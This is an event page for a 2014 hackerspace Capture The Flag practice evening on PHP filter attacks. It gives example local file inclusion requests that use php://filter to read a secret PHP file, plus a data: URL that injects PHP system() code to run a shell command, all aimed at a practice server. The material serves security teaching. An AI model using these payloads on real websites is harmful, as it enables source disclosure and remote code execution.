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CTF-practice-evening:2014-06-23 | |
Date | 2014/06/23 |
Time | |
Location | ACTA |
Type | Workshop |
Contact | Melanie |
iCalendar | Add to calendar |
Capture The Flag evening - Part 20
- 23 June, 2014 - 7 PM
- Please bring along a laptop with you!!!
General CTF Info
- See the page for the Ctf-evenings
- Link to the Tech Inc Challenge Website Scoreboard
PHP Filter attacks
- Coolfire is providing the content for this evening! :-)
- PHP commands:
- php://input
- output
- df
- memory
- temp
- filter
- Example of LFI attacks:
- 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
- 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
- http://coolfire.insomnia247 .nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
- ( expect:// )
- arrays: /index.php?page[]=A&page[]=B
Enigma group PHP challenges
- http://www.enigmagroup.org/missions/basics/auditing/1/
- (You have to create an account, and login to access this page!)
- Coolfire is using hackbar to supply the queries:
- And Live HTTP Headers to view/manipulate the headers:
- We solved challenges 1-11 together on the beamer! :-)